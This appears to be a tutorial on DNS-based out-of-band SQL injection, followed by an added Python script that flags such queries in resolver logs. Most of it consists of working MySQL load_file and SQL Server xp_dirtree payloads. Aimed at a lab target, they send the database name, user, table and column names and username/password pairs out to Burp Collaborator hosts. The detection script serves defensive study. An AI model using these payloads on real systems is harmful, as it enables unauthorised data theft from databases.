oxo1 Introduction
As everyone knows, blind injection pulls data out painfully slowly. Using dnslog solves that quickly, but the conditions for using it are fairly restrictive. Google the underlying principle if you need it.
1. secure_file_priv must not be NULL
2. Works on Windows, not on Linux
oxo2 Tools
http://ceye.io/
http://www.dnslog.cn/
BurpSuite: click Burp, then click Burp Collaborator client
https://github.com/ADOOO/DnslogSqlinj
oxo3 MySQL
1. Get the current database
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(database()),'.8enqwp3jaapnlvk6adhsaym9q0wqkf.burpcollaborator.net\\abc'))--+
2. Get the current database user
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',hex(user()),'.x97frey85zkcgkfv52ch5nhylprgf5.burpcollaborator.net\\abc'))--+
Because special characters have to be encoded to travel in a DNS name, the payload above uses hex; decoding it gives root@localhost
3. Get table names
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.7v3pdokir96m2u15rcyrrx387zdr1g.burpcollaborator.net\\abc'))--+
4. Get column names
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.ne55w43yapp2laklash7admoqfw8kx.burpcollaborator.net\\abc'))--+
5. Get data
http://192.168.237.128/Less-1/?id=1' and load_file(concat('\\\\',(select hex(concat(username,0x7e,password)) from security.users limit 0,1),'.ne55w43yapp2laklash7admoqfw8kx.burpcollaborator.net\\abc'))--+
oxo4 SQL Server
1. Get the database name
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),DB_NAME())+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
2. Get table names
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 name from sysobjects where xtype='u'))+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
3. Get column names
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'users') and name!='id'))+'.p0qgrjkjvnnqxa7krdxd60peg5mvak.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
4. Get data
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),(select top 1 username from users))+'.xuv0qxkeb8f32x8ko2gfihaeo5uvik.burpcollaborator.net';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
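From the defender's side, every MySQL load_file and SQL Server xp_dirtree payload above leaves the same trace: a resolver query whose leftmost label is a database value (plain or hex-encoded) glued onto an interaction domain. The script below is an added example, not code from this post or from the tools it lists; it scans constructed resolver log lines (assumed "<timestamp> <client> <qname>" layout) for names under the listed interaction domains and decodes hex labels such as the root@localhost one above.

```python
# Added detection helper: flag DNS names that look like out-of-band SQL exfiltration.
import re
from typing import Optional

# Constructed sample log lines in an assumed "<ts> <client> <qname>" layout (not a real product format).
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com
1700000001 10.0.0.5 726f6f74406c6f63616c686f7374.x97frey85zkcgkfv52ch5nhylprgf5.burpcollaborator.net
1700000002 10.0.0.7 security.8enqwp3jaapnlvk6adhsaym9q0wqkf.burpcollaborator.net
1700000003 10.0.0.9 cdn.static-assets.example.net
"""

OOB_SUFFIXES = ("burpcollaborator.net", "ceye.io", "dnslog.cn")  # interaction domains named in the post
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){4,}$")  # even-length hex label, at least 4 bytes

def decode_hex_label(label: str) -> Optional[str]:
    """Return the ASCII payload of a hex-encoded label, or None if it is not hex/ASCII."""
    if not HEX_LABEL.match(label):
        return None
    raw = bytes.fromhex(label)
    return raw.decode("ascii") if raw.isascii() else None

def classify(qname: str):
    """Return (reason, extracted_value) when the name looks like OOB exfil, else None."""
    name = qname.rstrip(".").lower()
    labels = name.split(".")
    if not any(name.endswith(s) for s in OOB_SUFFIXES):
        return None  # ordinary traffic, not under a known interaction domain
    payload = decode_hex_label(labels[0])
    if payload is not None:
        return ("hex-encoded label under OOB domain", payload)
    return ("query under OOB interaction domain", labels[0])

def scan_log(text: str):
    """Parse the log text and return one (client, qname, reason, value) tuple per suspicious query."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash mid-scan
        _ts, client, qname = parts
        verdict = classify(qname)
        if verdict:
            hits.append((client, qname, verdict[0], verdict[1]))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Feeding it real resolver logs only needs the line parser adjusted to that product's format; the classification logic is unchanged.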
oxo5 References
http://ceye.io/payloads
https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/%E4%B8%80%E7%AF%87%E4%BA%86%E8%A7%A3MSSQL.md